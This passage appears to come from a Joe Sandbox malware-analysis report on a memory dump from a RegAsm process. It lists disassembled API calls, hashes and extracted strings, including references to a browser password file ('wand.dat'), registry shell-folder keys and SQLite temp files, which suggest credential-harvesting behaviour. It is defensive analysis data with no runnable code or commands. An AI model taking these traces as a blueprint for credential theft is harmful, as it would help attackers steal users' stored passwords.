                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                • String ID: 0$6
                                                • API String ID: 2029023288-3849865405
                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                APIs
                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                • memset.MSVCRT ref: 00405455
                                                • memset.MSVCRT ref: 0040546C
                                                • memset.MSVCRT ref: 00405483
                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$memcpy$ErrorLast
                                                • String ID: 6$\
                                                • API String ID: 404372293-1284684873
                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: AttributesErrorFileLastSleep$free
                                                • String ID:
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                • wcscat.MSVCRT ref: 0040A0E6
                                                • wcscat.MSVCRT ref: 0040A0F5
                                                • wcscpy.MSVCRT ref: 0040A107
                                                Similarity
                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                • String ID:
                                                APIs
                                                Strings
                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                • <%s>, xrefs: 004100A6
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: wcscat$_snwprintfmemset
                                                • String ID: %2.2X
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _snwprintfwcscpy
                                                • String ID: dialog_%d$general$menu_%d$strings
                                                APIs
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                • memset.MSVCRT ref: 0040C439
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                • _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                • memset.MSVCRT ref: 0040C4D0
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                Similarity
                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                • String ID:
                                                APIs
                                                • memset.MSVCRT ref: 004116FF
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                Strings
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                APIs
                                                Similarity
                                                • API ID: AttributesFilefreememset
                                                • String ID:
                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                • malloc.MSVCRT ref: 00417524
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                • free.MSVCRT ref: 00417544
                                                • free.MSVCRT ref: 00417562
                                                Similarity
                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                • String ID:
                                                APIs
                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                • free.MSVCRT ref: 0041822B
                                                Strings
                                                Similarity
                                                • API ID: PathTemp$free
                                                • String ID: %s\etilqs_$etilqs_
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: ErrorLastMessage_snwprintf
                                                • String ID: Error$Error %d: %s
                                                APIs
                                                Strings
                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                APIs
                                                • memset.MSVCRT ref: 0044A6EB
                                                • memset.MSVCRT ref: 0044A6FB
                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                Strings
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: gj
                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                • malloc.MSVCRT ref: 004174BD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                • free.MSVCRT ref: 004174E4
                                                Similarity
                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                • String ID:
                                                APIs
                                                • GetParent.USER32(?), ref: 0040D453
                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                Similarity
                                                • API ID: Window$Rect$ClientParentPoints
                                                • String ID:
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                • memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                Similarity
                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                • String ID:
                                                APIs
                                                • wcscpy.MSVCRT ref: 0044475F
                                                • wcscat.MSVCRT ref: 0044476E
                                                • wcscat.MSVCRT ref: 0044477F
                                                • wcscat.MSVCRT ref: 0044478E
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                Strings
                                                Similarity
                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                • String ID: \StringFileInfo\
                                                APIs
                                                • memset.MSVCRT ref: 004100FB
                                                • memset.MSVCRT ref: 00410112
                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                • _snwprintf.MSVCRT ref: 00410141
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                • String ID: </%s>
                                                • API String ID: 3400436232-259020660
                                                APIs
                                                • memset.MSVCRT ref: 0040D58D
                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                • String ID: caption
                                                • API String ID: 1523050162-4135340389
                                                APIs
                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                • String ID: MS Sans Serif
                                                • API String ID: 210187428-168460110
                                                APIs
                                                • memset.MSVCRT ref: 0040560C
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.*$dat$wand.dat
                                                • API String ID: 2618321458-1828844352
                                                APIs
                                                • memset.MSVCRT ref: 00412057
                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                • String ID:
                                                • API String ID: 3550944819-0
                                                APIs
                                                • free.MSVCRT ref: 0040F561
                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$free
                                                • String ID: g4@
                                                • API String ID: 2888793982-2133833424
                                                APIs
                                                • memset.MSVCRT ref: 004144E7
                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                • memset.MSVCRT ref: 0041451A
                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                • String ID:
                                                • API String ID: 1127616056-0
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                • malloc.MSVCRT ref: 00417459
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                • free.MSVCRT ref: 0041747F
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$freemalloc
                                                • String ID:
                                                • API String ID: 2605342592-0
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                • RegisterClassW.USER32(?), ref: 00412428
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                • String ID:
                                                • API String ID: 2678498856-0
                                                APIs
                                                • memset.MSVCRT ref: 0040F673
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                • strlen.MSVCRT ref: 0040F6A2
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                APIs
                                                • memset.MSVCRT ref: 0040F6E2
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                • strlen.MSVCRT ref: 0040F70D
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcscpy$CloseHandle
                                                • String ID: General
                                                • API String ID: 3722638380-26480598
                                                APIs
                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                • String ID:
                                                • API String ID: 764393265-0
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Time$System$File$LocalSpecific
                                                • String ID:
                                                • API String ID: 979780441-0
                                                APIs
                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$DialogHandleModuleParam
                                                • String ID:
                                                • API String ID: 1386444988-0
                                                APIs
                                                • wcschr.MSVCRT ref: 0040F79E
                                                • wcschr.MSVCRT ref: 0040F7AC
                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcschr$memcpywcslen
                                                • String ID: "
                                                • API String ID: 1983396471-123907689
                                                APIs
                                                • _snwprintf.MSVCRT ref: 0040A398
                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _snwprintfmemcpy
                                                • String ID: %2.2X
                                                • API String ID: 2789212964-323797159
                                                APIs
                                                • memset.MSVCRT ref: 0040E770
                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: MessageSendmemset
                                                • String ID: F^@
                                                • API String ID: 568519121-3652327722
                                                APIs
                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??3@DeleteObject
                                                • String ID: r!A
                                                • API String ID: 1103273653-628097481
                                                APIs
                                                • wcslen.MSVCRT ref: 0040B1DE
                                                • free.MSVCRT ref: 0040B201
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                • free.MSVCRT ref: 0040B224
                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$memcpy$mallocwcslen
                                                • String ID:
                                                • API String ID: 726966127-0
                                                APIs
                                                • strlen.MSVCRT ref: 0040B0D8
                                                • free.MSVCRT ref: 0040B0FB
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                • free.MSVCRT ref: 0040B12C
                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$memcpy$mallocstrlen
                                                • String ID:
                                                • API String ID: 3669619086-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@
                                                • String ID:
                                                • API String ID: 1033339047-0
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                • malloc.MSVCRT ref: 00417407
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                • free.MSVCRT ref: 00417425
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$freemalloc
                                                • String ID:
                                                • API String ID: 2605342592-0